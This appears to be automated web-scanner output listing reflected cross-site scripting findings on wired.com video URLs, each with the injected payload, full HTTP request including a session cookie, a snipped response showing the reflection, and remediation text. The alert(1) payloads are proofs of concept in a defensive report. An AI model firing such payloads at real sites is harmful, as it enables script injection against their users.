Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057468f9c"-alert(1)-"1deb7ddd208/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:53:17 GMT Date: Mon, 22 Nov 2010 00:48:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69d61"-alert(1)-"8d2a6e6c54f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan69d61"-alert(1)-"8d2a6e6c54f/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:00 GMT Date: Mon, 22 Nov 2010 00:49:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c3a"-alert(1)-"d453e615d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/66489396600136c3a"-alert(1)-"d453e615d9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:54:11 GMT Date: Mon, 22 Nov 2010 00:49:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><a>ad70241ee00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4fd83"><a>ad70241ee00/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29456 Vary: Accept-Encoding Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:46:40 GMT Date: Mon, 22 Nov 2010 00:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4fd83"><a>ad70241ee00 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload e30a8--><script>alert(1)</script>a31e866130d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29491 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe30a8--><script>alert(1)</script>a31e866130d/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332c2"><a>91f441f5d3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos332c2"><a>91f441f5d3c/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos332c2"><a>91f441f5d3c c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b06d"-alert(1)-"2d478deefda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1b06d"-alert(1)-"2d478deefda/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:48:50 GMT Date: Mon, 22 Nov 2010 00:44:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e351"-alert(1)-"ee6ab5df533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights1e351"-alert(1)-"ee6ab5df533/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f2"><a>756b85c7199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsd18f2"><a>756b85c7199/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:48:57 GMT Date: Mon, 22 Nov 2010 00:44:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsd18f2"><a>756b85c7199"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39664"-alert(1)-"96d7430c046 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057439664"-alert(1)-"96d7430c046/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:18 GMT Date: Mon, 22 Nov 2010 00:46:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab2ab"-alert(1)-"be5e8af1f82 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suitsab2ab"-alert(1)-"be5e8af1f82/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:51:08 GMT Date: Mon, 22 Nov 2010 00:46:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72896"-alert(1)-"e1d2c6c34d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300172896"-alert(1)-"e1d2c6c34d2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:51:42 GMT Date: Mon, 22 Nov 2010 00:46:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2096"><a>cac0c655b17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoc2096"><a>cac0c655b17/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29429 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:40:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoc2096"><a>cac0c655b17 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8cb5c--><script>alert(1)</script>495ed423392 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29464 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:17 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afea"><a>5e215e36fac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1afea"><a>5e215e36fac/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:46:53 GMT Date: Mon, 22 Nov 2010 00:42:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1afea"><a>5e215e36fac c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 321c9"-alert(1)-"464fbd33c85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos321c9"-alert(1)-"464fbd33c85/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:47:41 GMT Date: Mon, 22 Nov 2010 00:43:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5318"-alert(1)-"fd2d86b2125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsd5318"-alert(1)-"fd2d86b2125/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:48:56 GMT Date: Mon, 22 Nov 2010 00:44:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
